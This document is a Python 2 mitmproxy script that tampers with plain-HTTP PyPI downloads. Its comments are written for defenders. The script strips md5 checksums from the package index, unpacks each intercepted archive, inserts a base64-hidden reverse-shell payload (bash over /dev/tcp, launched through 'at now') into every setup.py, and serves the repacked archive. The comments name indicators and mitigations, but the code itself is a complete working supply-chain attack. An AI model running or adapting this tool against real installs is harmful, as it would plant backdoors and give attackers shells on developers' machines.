# -*- coding: utf-8 -*- | |
# | |
import tempfile | |
import sys, os | |
import re | |
# Address the injected payload connects back to. Loopback here, i.e. a lab /
# demo configuration. For defenders: an outbound TCP connection from a
# `pip install` / `python setup.py` process to an unexpected host:port is the
# primary network-level indicator of this technique.
LHOST, LPORT = ('127.0.0.1', '4444')
# One-line Python statement that response() below splices into every setup.py
# of an intercepted package. When the victim's setup.py runs, it calls
# os.system() to schedule, via `at now`, a bash command that opens a TCP
# connection to LHOST:LPORT through bash's /dev/tcp pseudo-device (on file
# descriptor 76) and attaches a shell to it. Host-level indicators visible in
# this payload: a setup.py / pip process spawning `at`, and bash command lines
# containing `/dev/tcp/`.
PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s;
sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT))
# The raw triple-quoted literal spans two source lines; collapse it to a single
# line before it is base64-encoded and injected (see response()).
PAYLOAD = PAYLOAD.replace('\n', '')
def response(context, flow):
    """mitmproxy response hook (older inline-script signature ``response(context, flow)``).

    Tampers with traffic to pypi.python.org in two steps so that a package
    installed through this proxy carries the PAYLOAD defined above:

    1. On the plain-HTTP simple index, strip the ``#md5=`` digest fragments
       from the download links so the client has no checksum to compare the
       modified archive against.
    2. On an archive download (``application/octet-stream`` from the PyPI
       host), unpack it, insert ``exec ("<base64>".decode("base64"))`` before
       the ``setup(`` call of every setup.py, repack it and return the
       modified archive as the response body.

    The technique depends on the client fetching the index and the archive
    over unauthenticated HTTP (note the ``http://`` prefix below) and on the
    only integrity check being an in-band, unauthenticated md5 fragment that
    the proxy can simply delete. A client that verifies the server
    certificate over TLS and pins hashes (e.g. pip's ``--require-hashes``)
    is not exposed to either step. The ``.encode('base64')`` codec and the
    str/bytes mixing mark this as Python 2-era code.

    Args:
        context: mitmproxy script context (unused here).
        flow: the HTTP flow; ``flow.request`` is inspected and
            ``flow.response.content`` is rewritten in place.

    Returns:
        None in all cases; all effects are on ``flow.response``.
    """
    # Nothing to classify without a Content-Type; leave the response untouched.
    if not 'Content-Type' in flow.response.headers:
        return None
    # Step 1: index tampering. The index is being read in cleartext, which is
    # the precondition for this whole script.
    if flow.request.get_url().startswith('http://pypi.python.org/simple/'):
        # Remove the md5 fragments so the client never sees a digest that the
        # re-packed archive below would fail to match.
        flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content)
    # Step 2: archive tampering, keyed on content type plus the PyPI host.
    if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\
            and flow.request.host == 'pypi.python.org':
        # Scratch directory on the proxy host. It is never removed, so an
        # unpacked copy of every tampered package is left on disk - useful
        # forensic evidence of the proxy's activity.
        tmp_dir = tempfile.mkdtemp()
        os.chdir(tmp_dir)
        # The last path component of the request URL doubles as the local
        # filename; the file handle is never closed explicitly.
        filename = flow.request.get_path_components()[-1]
        open(filename, 'wb').write(flow.response.content)
        os.mkdir('extracted')
        # Unpack / repack through the atool wrappers (aunpack / apack), which
        # accept whatever archive format the package was served in.
        os.system('aunpack -X '+tmp_dir+'/extracted '+filename)
        # Insert `exec ("<base64>".decode("base64"))` on the line before every
        # `setup(` in every setup.py. The base64 wrapping hides the payload from
        # a casual read of the diff; a static check for `.decode("base64")` or
        # `exec (` in setup.py is a cheap detection for this specific variant.
        os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%'''
                  '''s".decode("base64"))' ''' %
                  PAYLOAD.encode('base64').replace('\n', ''))
        os.chdir('extracted')
        os.system('apack -f ../%s *' % filename)
        # Serve the re-packed archive in place of the original body.
        flow.response.content = open('../%s' % filename, 'rb').read()